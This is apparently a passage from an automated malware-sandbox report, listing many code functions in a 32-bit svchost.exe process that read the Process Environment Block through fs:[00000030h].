Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C062D6 mov eax, dword ptr fs:[00000030h]	1_2_03C062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov ecx, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC62A0 mov eax, dword ptr fs:[00000030h]	1_2_03BC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]	1_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E284 mov eax, dword ptr fs:[00000030h]	1_2_03B6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB0283 mov eax, dword ptr fs:[00000030h]	1_2_03BB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B402E1 mov eax, dword ptr fs:[00000030h]	1_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3A2C3 mov eax, dword ptr fs:[00000030h]	1_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]	1_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C0625D mov eax, dword ptr fs:[00000030h]	1_2_03C0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]	1_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]	1_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]	1_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]	1_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEA250 mov eax, dword ptr fs:[00000030h]	1_2_03BEA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]	1_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]	1_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]	1_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]	1_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]	1_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]	1_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]	1_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD4180 mov eax, dword ptr fs:[00000030h]	1_2_03BD4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]	1_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]	1_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]	1_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C04164 mov eax, dword ptr fs:[00000030h]	1_2_03C04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]	1_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov eax, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDE10E mov ecx, dword ptr fs:[00000030h]	1_2_03BDE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]	1_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]	1_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]	1_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]	1_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	1_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	1_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B280A0 mov eax, dword ptr fs:[00000030h]	1_2_03B280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]	1_2_03BC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]	1_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	1_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	1_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]	1_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]	1_2_03BB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]	1_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC6030 mov eax, dword ptr fs:[00000030h]	1_2_03BC6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]	1_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]	1_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]	1_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD2000 mov eax, dword ptr fs:[00000030h]	1_2_03BD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]	1_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]	1_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]	1_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B307AF mov eax, dword ptr fs:[00000030h]	1_2_03B307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE47A0 mov eax, dword ptr fs:[00000030h]	1_2_03BE47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD678E mov eax, dword ptr fs:[00000030h]	1_2_03BD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]	1_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B347FB mov eax, dword ptr fs:[00000030h]	1_2_03B347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B527ED mov eax, dword ptr fs:[00000030h]	1_2_03B527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBE7E1 mov eax, dword ptr fs:[00000030h]	1_2_03BBE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3C7C0 mov eax, dword ptr fs:[00000030h]	1_2_03B3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB07C3 mov eax, dword ptr fs:[00000030h]	1_2_03BB07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov ecx, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6273C mov eax, dword ptr fs:[00000030h]	1_2_03B6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAC730 mov eax, dword ptr fs:[00000030h]	1_2_03BAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]	1_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C720 mov eax, dword ptr fs:[00000030h]	1_2_03B6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30710 mov eax, dword ptr fs:[00000030h]	1_2_03B30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60710 mov eax, dword ptr fs:[00000030h]	1_2_03B60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C700 mov eax, dword ptr fs:[00000030h]	1_2_03B6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B38770 mov eax, dword ptr fs:[00000030h]	1_2_03B38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B40770 mov eax, dword ptr fs:[00000030h]	1_2_03B40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B30750 mov eax, dword ptr fs:[00000030h]	1_2_03B30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BBE75D mov eax, dword ptr fs:[00000030h]	1_2_03BBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]	1_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72750 mov eax, dword ptr fs:[00000030h]	1_2_03B72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4755 mov eax, dword ptr fs:[00000030h]	1_2_03BB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov esi, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6674D mov eax, dword ptr fs:[00000030h]	1_2_03B6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B666B0 mov eax, dword ptr fs:[00000030h]	1_2_03B666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C6A6 mov eax, dword ptr fs:[00000030h]	1_2_03B6C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]	1_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34690 mov eax, dword ptr fs:[00000030h]	1_2_03B34690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE6F2 mov eax, dword ptr fs:[00000030h]	1_2_03BAE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB06F1 mov eax, dword ptr fs:[00000030h]	1_2_03BB06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A6C7 mov ebx, dword ptr fs:[00000030h]	1_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A6C7 mov eax, dword ptr fs:[00000030h]	1_2_03B6A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E627 mov eax, dword ptr fs:[00000030h]	1_2_03B4E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B66620 mov eax, dword ptr fs:[00000030h]	1_2_03B66620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B68620 mov eax, dword ptr fs:[00000030h]	1_2_03B68620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3262C mov eax, dword ptr fs:[00000030h]	1_2_03B3262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B72619 mov eax, dword ptr fs:[00000030h]	1_2_03B72619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE609 mov eax, dword ptr fs:[00000030h]	1_2_03BAE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4260B mov eax, dword ptr fs:[00000030h]	1_2_03B4260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B62674 mov eax, dword ptr fs:[00000030h]	1_2_03B62674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]	1_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF866E mov eax, dword ptr fs:[00000030h]	1_2_03BF866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]	1_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A660 mov eax, dword ptr fs:[00000030h]	1_2_03B6A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4C640 mov eax, dword ptr fs:[00000030h]	1_2_03B4C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]	1_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B545B1 mov eax, dword ptr fs:[00000030h]	1_2_03B545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB05A7 mov eax, dword ptr fs:[00000030h]	1_2_03BB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6E59C mov eax, dword ptr fs:[00000030h]	1_2_03B6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32582 mov eax, dword ptr fs:[00000030h]	1_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32582 mov ecx, dword ptr fs:[00000030h]	1_2_03B32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B64588 mov eax, dword ptr fs:[00000030h]	1_2_03B64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]	1_2_03B5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B325E0 mov eax, dword ptr fs:[00000030h]	1_2_03B325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6C5ED mov eax, dword ptr fs:[00000030h]	1_2_03B6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B365D0 mov eax, dword ptr fs:[00000030h]	1_2_03B365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]	1_2_03B6A5D0
